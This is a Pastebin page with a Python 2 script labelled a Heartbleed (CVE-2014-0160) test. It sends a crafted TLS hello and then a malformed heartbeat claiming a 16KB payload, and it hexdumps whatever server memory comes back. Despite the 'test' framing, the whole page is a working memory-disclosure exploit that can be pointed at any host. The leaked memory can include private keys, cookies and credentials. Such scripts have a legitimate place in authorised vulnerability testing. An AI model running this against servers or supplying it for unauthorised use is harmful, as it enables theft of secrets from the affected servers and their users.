FeRR4L

Heartbleed Test Script

Apr 13th, 2014
206
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.37 KB | None | 0 0
  1. #!/usr/bin/env python2
  2.  
  3. import sys
  4. import struct
  5. import socket
  6. import time
  7. import select
  8. import re
  9. from optparse import OptionParser
  10.  
  11. options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
  12. options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
  13. options.add_option('-s', '--starttls', action='store_true', default=False, help='Check STARTTLS')
  14. options.add_option('-d', '--debug', action='store_true', default=False, help='Enable debug output')
  15.  
  16. def h2bin(x):
  17.     return x.replace(' ', '').replace('\n', '').decode('hex')
  18.  
  19. hello = h2bin('''
  20. 16 03 01 00 63 01 00 00 5f 03 01 53 44 75 1a e8
  21. 47 2f 15 a1 29 0a a3 63 95 43 c5 69 05 32 cb 4e
  22. 1b 88 3e 62 8a 22 a7 73 69 f1 1a 00 00 18 00 2f
  23. 00 35 00 05 00 0a c0 13 c0 14 c0 09 c0 0a 00 32
  24. 00 38 00 13 00 04 01 00 00 1e ff 01 00 01 00 00
  25. 05 00 05 01 00 00 00 00 00 0a 00 06 00 04 00 17
  26. 00 18 00 0b 00 02 01 00
  27. ''')
  28.  
  29. hb = h2bin('''
  30. 18 03 02 00 03
  31. 01 40 00
  32. ''')
  33.  
  34. def hexdump(s):
  35.     for b in xrange(0, len(s), 16):
  36.         lin = [c for c in s[b : b + 16]]
  37.         hxdat = ' '.join('%02X' % ord(c) for c in lin)
  38.         pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
  39.         print '  %04x: %-48s %s' % (b, hxdat, pdat)
  40.     print
  41.  
  42. def recvall(s, length, timeout=5):
  43.     endtime = time.time() + timeout
  44.     rdata = ''
  45.     remain = length
  46.     while remain > 0:
  47.         rtime = endtime - time.time()
  48.         if rtime < 0:
  49.             return None
  50.         r, w, e = select.select([s], [], [], 5)
  51.         if s in r:
  52.             data = s.recv(remain)
  53.             # EOF?
  54.             if not data:
  55.                 return None
  56.             rdata += data
  57.             remain -= len(data)
  58.     return rdata
  59.        
  60.  
  61. def recvmsg(s):
  62.     hdr = recvall(s, 5)
  63.     if hdr is None:
  64.         print 'Unexpected EOF receiving record header - server closed connection'
  65.         return None, None, None, None
  66.     typ, ver, ln = struct.unpack('>BHH', hdr)
  67.     pay = recvall(s, ln, 10)
  68.     if pay is None:
  69.         print 'Unexpected EOF receiving record payload - server closed connection'
  70.         return None, None, None, None
  71.     print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
  72.     return typ, ver, pay, ln
  73.  
  74. def hit_hb(s):
  75.     s.send(hb)
  76.     while True:
  77.         typ, ver, pay, ln = recvmsg(s)
  78.         if typ is None:
  79.             print 'No heartbeat response received, server likely not vulnerable'
  80.             return False
  81.  
  82.         if typ == 24:
  83.             print 'Received heartbeat response:'
  84.             hexdump(pay)
  85.             if len(pay) > 3:
  86.                 print 'WARNING: server returned more data than it should - server is vulnerable!'
  87.             else:
  88.                 print 'Server processed malformed heartbeat, but did not return any extra data.'
  89.             return True
  90.  
  91.         if typ == 21:
  92.             print 'Received alert:'
  93.             hexdump(pay)
  94.             print 'Server returned error, likely not vulnerable'
  95.             return False
  96.  
  97. def main():
  98.     opts, args = options.parse_args()
  99.     if len(args) < 1:
  100.         options.print_help()
  101.         return
  102.  
  103.     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  104.     print 'Connecting...'
  105.     sys.stdout.flush()
  106.     s.connect((args[0], opts.port))
  107.  
  108.     if opts.starttls:
  109.         re = s.recv(4096)
  110.         if opts.debug: print re
  111.         s.send('ehlo starttlstest\n')
  112.         re = s.recv(1024)
  113.         if opts.debug: print re
  114.         if not 'STARTTLS' in re:
  115.             if opts.debug: print re
  116.             print 'STARTTLS not supported...'
  117.             sys.exit(0)
  118.         s.send('starttls\n')
  119.         re = s.recv(1024)
  120.    
  121.     print 'Sending Client Hello...'
  122.     sys.stdout.flush()
  123.     s.send(hello)
  124.     print 'Waiting for Server Hello...'
  125.     sys.stdout.flush()
  126.     while True:
  127.         typ, ver, pay, ln = recvmsg(s)
  128.         if typ == None:
  129.             print 'Server closed connection without sending Server Hello.'
  130.             return
  131.         # Look for server hello done message.
  132.         if typ == 22 and (ord(pay[ln-4])) == 0x0e:
  133.             print 'server hello done'
  134.             break
  135.     # Look for server hello done message.
  136.  
  137.     print 'Sending heartbeat request...'
  138.     sys.stdout.flush()
  139.     s.send(hb)
  140.     hit_hb(s)
  141.  
  142. if __name__ == '__main__':
  143.     main()
Add Comment
Please, Sign In to add comment